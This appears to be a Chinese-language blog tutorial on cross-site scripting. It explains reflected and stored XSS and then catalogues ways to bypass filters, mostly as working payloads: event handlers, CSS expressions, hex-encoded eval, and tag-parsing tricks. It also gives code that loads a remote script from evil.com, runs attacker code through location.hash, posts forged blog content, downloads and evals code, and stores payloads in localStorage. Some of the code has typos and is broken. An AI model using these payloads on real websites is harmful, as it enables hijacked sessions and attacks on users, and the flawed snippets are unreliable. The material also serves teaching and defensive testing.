初探XSS

1. 基础准备知识

(1) php: <?php ?>部分由服务器解析后并连带html代码一并返回给浏览器，类似jsp的操作，一般开发中都使用smarty模板将前端后端分开。所以在XSS跨站中，可以使用get参数传值的方式进行XSS攻击

(2) EL表达式：对于EL表达式${name},EL表达式首先从page,session,request,

application。范围内检索信息，直到检索到name的信息后则会停止检索。

非持久形XSS：通过构造编码恶意URL发送给用户，当其点击的时候则会执行JS语句将客户信息发送到攻击者能捕获到的位置.

(3) <script defer="defer"> </script>这样的脚本只有在页面加载完毕会执行。正常脚本都是在页面加载前就已经执行了。

(4) getElementsByTagName()("head")[0].appendChild(s);获取某个标签的第几个元素追加一个元素。

(5) 使用document.wirte()的时候要注意不要在该<script>标签里使用defer属性。在页面加载完成后在使用document.write()会覆盖已经加载的页面。所以js代码在浏览器解析过程中单位是事先被加载的。

(6) 强大的eval函数，eval函数

持久型XSS：利用别的漏洞将文件或js代码上传到服务器。通常可以使用博客，留言等功能进行恶意代码的上传。当别人浏览该博客时就会执行恶意js代码。其不需要用户单击URL，常用于挂马，渗透，钓鱼。传播蠕虫之用。

XSS是针对客户端的攻击，也就是所有的cookie，post，http头，get都会产生XSS。

持久型XSS攻击中，当XSS代码没有被执行而是被直接显示在页面上的时候极有可能是代码被转义

2.绕过XSS过滤器

（1） 使用<>来注入js：最简单的注入使用<script>来进行注入

（2） 利用HTML标签来注入：利用很多html标签属性支持伪协议如javascript:[]的形式，如table的background属性，img的src属性，还有以下标签可以进行XSS注入，href,lowsrc,bgsound,backgound,value,action,dynsrc，有的浏览器不支持伪协议。

（3） 通过空格和回车：可以使用空格和回车进行XSS过滤器的绕过，针对完整名黑名单的比对，如直接检测输入中是否含有javascript等标记的过滤器。可以将javascript写成jav   ascript,JaVaScRiPt,等。与绕过sql注入过滤器的思路是一样。记住以分好来标记结束就行

（4） 编码转换：对javascript进行编码转换来绕过，javascipt:alert('xss');转换为javascriptt:alert(/XSS/);，将字母转为对应的ASCII（美国信息交换标准代码）形式。

（5） 产生自己的事件：在input中用事件,<input type="text" value=""   onclick="alert(/xss/)" />

W3C将事件分成三个不同类别:

用户接口(鼠标，键盘)

逻辑(处理的结果)

变化(对文档进行修改)

有如下事件可以加以利用来执行XSS代码：

onResume

onReverse

onRowDelete

onRowInserted

onSeek

onSynchRestored

onTimeError

onTrackChange

onURLFlip

onRepeat

onMediaComplete

onMediaError

onPause

onProgress

onOutOfSync

oncontrolselect

onlayoutcomplete

onafterprint

onbeforeprint

ondataavailable

ondatasetchanged

ondatasetcomplate

onerrorupdate

onrowenter

onrowexit

onrowsdelete

onrowsinserted

onselectionchange

onbounce

onfinish

onstop

onresizeend

(6)利用CSS跨站剖析

1.<div style="background-image:url(javascript:alert(/xss/))">

2.<style>

body {background-image:url("javascript:alert('xss')");}

</style>

3.<link herf="xxx.css">

xxx.css如下

body{

background-image:url("javascript:alert(/xss/)");

}

4.

p{

background-image:expression(alert('xss'));

}

使用CSS会因浏览器不同产生各种差异

(7)扰乱过滤规则：

1.<image/src="xx">  IE6能成功执行

2.expression中可使用全角字符

3.也可以用sql注入一样使用/**/代替空格

4.<button onclick="eval('\x61\x6C\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29');">点击就送</button>

eval()配合String.fromCharCode();可以执行10进制的脚本，

5. 浏览器解析HTML时，注释存在问题

<!--<img src="--><img src=x onerror=alert(1) //">

<comment><img src="</comment><img src=x onerror=alert(1) //">

6.使用纯文本逃避过滤

<system><img src="</style><img src=x onerror=alert(1) //">

拆分跨站法

很多时候输入长度有限制但没有严格过滤的时候可以使用剑心的拆分跨站法绕过输入限制，前提是输入至少能容纳<script>var x="d"</script>

<script>var x="document.write('<script>alert(1)</script>')"</script>

将上述依据拆分成x="o";

XSS中动态调用远程javaScript

1. 如交互点也是get请求的参数那么可以直接在URL中使用javascript，但是比较明显。没有掩藏攻击意图。

所以应该用编码或者远程加载的方式来加载javascript

2. 使用DOM插入

var s=document.createElement("script");

s.src="http://www.evil.com/xss.js";

document.getElementsByTagName("head")[0].appendChild(s);

grtElementsByTagName()函数查找返回文档中第一个元素，利用appendChild（）函数调用元素参数s，追加指定的节点到子节点列表最后一个。就是把<script>插到<head>后面

3. 使用location调用语句

eval()有计算字符串并执行js代码的作用，而location.hash.substr(1)就是计算出#后的字符串给予eval函数给执行。所以执行了alert(/xss/);

http://www.bug.com/veiw.php?sort="><script>eval(location.hash.substr(1))</script>#alert('xss')

以下即是通过url执行XSS跨站的脚本事例

http://www.bug.com/veiw.php?sort="><script>eval(location.hash.substr(1))</script>

# var url="/index.php?mod=blog&act=dopost";

var content="blog_content=By%3A%E5%AD%A4   ";

function _sd_Post(Url, Args){

var xmlhttp;

var error;

eval('try {xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");}catch(e){ xmlhttp=null;error=e;}');

if(null!=xmlhttp){ xmlHTTP.Open("POST",Url,false); xmlhttp.setRequestHeader("x-requested-with","XMLHttpRequest");

xmlhttp.setRequestHeader("Referer","http://www.my.com/api_proxy.html");

xmlhttp.setRequestHeader("Accept","application/json, text/javascript,*/*");

xmlhttp.setRequestHeader("Conteng-Type","application/x-www-form-urlencoded");

xmlhttp.setRequestHeader("Host","www.my.com");

xmlhttp.Send(Args);

strText=xmlhttp.responseText;}}_sd_Post(url,content);

}

XSS Downloader

此种方式可以在事先插入了XSS代码后，再通过XSSdownloader下载再执行。

function XSS(){

var xmlhttp;

if (window.XMLHttpRequest)

{// code for IE7+, Firefox, Chrome, Opera, Safari

xmlhttp=new XMLHttpRequest();}

else

{// code for IE6, IE5

xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");}

xmlhttp.onreadystatechange=function()

{ if (xmlhttp.readyState==4 && xmlhttp.status==200)

{ var  b=xmlhttp.responseText;

//第一层过滤是为了拿到body

var c=b.substring(b.indexOf('<body>'),b.indexOf('</body>'));

//第二层过滤是为了拿到需要的XSS代码

eval(c.substring(c.indexOf('eval'),c.indexOf(';')));} }

xmlhttp.open("GET","csst.jsp",true);

xmlhttp.send();}

将XSS代码存储在cookie中：

localStorage.a="xss";

document.write(localStorage.a);

if(localStorage.count)

{localStorage.count=Number(localStorage.count)+1;

}

else

{localStorage.count=1;

}

document.write("访问次数"+localStorage.count+"time(s).");

存取到Flash cooike

function setShellCodz(code){

window.localStorage.setItem("shellcodz".codz)

}

取出Flash cookie

function getShellCodz(){

eval(window.localstorage.getItem("shellcodz"));

}

事例：

<body>

<script>

function setShellCodz(code) {

if(document.getElementById("xss").value!=null||document.getElementById("xss").value.length!=0)

codz=document.getElementById("xss").value;

window.localStorage.setItem("shellcodz",codz);

}

function getShellCodz() {

eval(window.localStorage.getItem("shellcodz"));

}

</script>

<input type="text" id="xss" />

<button onclick="setShellCodz()">set</button>

<button onclick="getShellCodz()">get</button>

</body>